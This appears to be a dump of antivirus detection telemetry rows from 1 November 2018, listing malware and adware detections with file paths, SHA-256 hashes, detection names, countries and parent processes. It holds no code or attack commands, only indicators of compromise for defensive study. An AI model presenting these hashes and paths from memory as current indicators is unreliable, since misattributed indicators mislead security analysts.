  Row(detection=Row(filename='removeassinaturapramim.exe', filepath='C:\\Users\\X\\Desktop\\RemoveAssinaturaPraMim\\RemoveAssinaturaPraMim.exe', filesize=512000, name='TR/Spy.Banker.Gen.#M300.#R3644'), hash='6f1e01d3c6ba1641c7b10604ac1c392b8133912c6b04f8a6d9c4750ebb5c15e6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:34:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='6f45ceba7d6da57833b2d4b6c4ac992f6ef8b9d415eb76b509a188b23bea45d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.pif', filepath='\\?\\H:\\System Volume Information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:39:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.pif', filepath='\\?\\C:\\Users\\X\\Desktop\\اهنگ فلش\\فیلم انهدام خارجی\\System Volume Information\\System Volume Information.pif', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nofel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nofel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6f6d5c58caebfd595b3cd4b494172b5506c28ea73f953d2c95849c9d581ea349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T15:45:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:36:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103204-c2531992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81885465\\AVSCAN-20181101-103108-BCD9A830\\AVSCAN-20181101-103204-C2531992', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='\\\\?\\C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:23:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080721-104e39e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b500daa0\\AVSCAN-20181101-080639-0BFA43B9\\AVSCAN-20181101-080721-104E39E2', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:08:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\WmiAppSrv\\svchost.exe', parentsize=1057792, timestamp='2018-11-01T21:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:22:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-085528-7ce00020', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-085424-4733D9E0\\AVSCAN-20181101-085528-7CE00020', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:55:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Elex-tech\\YAC\\iSafeSvc2.exe', parentsize=131024, timestamp='2018-11-01T01:06:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.vir', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.VIR', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:06:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112834-fb37a514', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bee60138\\AVSCAN-20181101-102815-AAFA40C5\\AVSCAN-20181101-112834-FB37A514', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cloudbackup9681.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\CloudBackup9681.exe', filesize=5600000, name='PUA/MyPCBackup.Gen.#M300.#R5908'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline='\\\\\\/monitor', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T19:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T17:18:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T10:00:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T09:53:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='winword.exe', filepath='C:\\Program Files\\Microsoft Office\\OFFICE11\\WINWORD.EXE', filesize=12380000, name='W32/Sality.AG.#M1.#R1'), hash='6fcaf2ea71bca11d896c0810d2a5c69b029235c8a670f929e536077214243226', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T09:40:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162833-dc5de65a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb0b97ab\\AVSCAN-20181101-162101-A35BC612\\AVSCAN-20181101-162833-DC5DE65A', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215607-36709519', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215607-36709519', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:56:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215915-4e814098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215915-4E814098', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:59:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215850-4b4afce7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215850-4B4AFCE7', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215837-49b215a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215837-49B215A1', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215815-46d017bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215815-46D017BD', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215856-4c08f9ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215856-4C08F9EC', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215509-2f1e8363', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215509-2F1E8363', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215658-3cf2b9f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215658-3CF2B9F7', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:57:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000059dc', filepath='C:\\Windows\\Temp\\tmp00003286\\tmp000059dc', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='706b0a606aa0d5dbd99e12457e48b957e34c8d6dc63a0495fded9c07cc9130f8', metadata=Row(cmdline='-k bdx -s scan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T08:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-032411-dbe6e6d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b9e5b6d\\AVSCAN-20181101-031321-89EC6A36\\AVSCAN-20181101-032411-DBE6E6D9', filesize=1212000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='7099b3ead18e31a00956c2e611edf9c52da535fb82ece0114bcc7457648ca007', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autopatcher.exe', filepath='E:\\Mido\\UnitedGenerals\\Autopatcher.exe', filesize=1664000, name='TR/Atom.diukt.#M1.#R1'), hash='70b12a0532bd469190d928d5abb80014175985bb2a371c9bdf13aa0a2cd8fe0b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:07:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000817-45dfd2f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12d19096\\AVSCAN-20181102-000757-4318F123\\AVSCAN-20181102-000817-45DFD2F9', filesize=1664000, name='TR/Atom.diukt.#M1.#R1'), hash='70b12a0532bd469190d928d5abb80014175985bb2a371c9bdf13aa0a2cd8fe0b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cfprocsrvc.exe', filepath='C:\\Program Files (x86)\\TOSHIBA\\ConfigFree\\CFProcSRVC.exe', filesize=112000, name='W32/Sality.AT.#M1.#R1'), hash='7124621f60008b12b51899275b5e8bde293d8d2375748ac08c57164823e1153c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:44:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='712a5908ea66f2cd486d0fe6a8050096a6a75cd68d168788aeca5883f0a588b9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RIdwvh5s+kOFR+bY.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T21:55:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000e76b', filepath='C:\\Windows\\Temp\\tmp00007606\\tmp0000e76b', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='717cf1ef3efd0a87e5088c1cdef692880ccaab44e7361f419c074ab2bd81b733', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T15:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsdx32-sse4.dll', filepath='H:\\模擬器\\pcsx2-v1.5.0-dev-2014-gb2a2a3a-windows-x86\\plugins\\GSdx32-SSE4.dll', filesize=2432000, name='W32/Ramnit.CD.#M1.#R1'), hash='71b4c7e7e80e54d814e542d3075a9d0b62831b950076c5b2189f63f0e4585f9a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-01T14:46:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142441-cf5cf433', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-141936-BBE58BE8\\AVSCAN-20181101-142441-CF5CF433', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='723781da9dd34e794ac7e9f373408d9f8cc1c9f50fad6abc9d7368b3b2926654', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='службная записка ключи от зала ихибт.exe', filepath='E:\\УФКиС\\служебные записки\\службная записка ключи от зала ИХИБТ.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='723781da9dd34e794ac7e9f373408d9f8cc1c9f50fad6abc9d7368b3b2926654', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:12:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164222-2ba23f74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164222-2BA23F74', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161300-f8bbb87f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-161300-F8BBB87F', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145454-3d943f81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-145454-3D943F81', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:55:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154108-616f39ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_30cda9a5\\AVSCAN-20181101-064204-6F5AEFD4\\AVSCAN-20181101-154108-616F39CE', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jh.exe', filepath='e:\\documents and settings\\X\\application data\\disscouuntexteonsii\\Jh.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164533-4ce279af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164533-4CE279AF', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:45:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wijdq.exe', filepath='C:\\ProgramData\\RoyaalCouponu\\WIJdq.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23816, timestamp='2018-11-01T22:10:20Z'), dt=datetime.date(2018, 11, 1)),
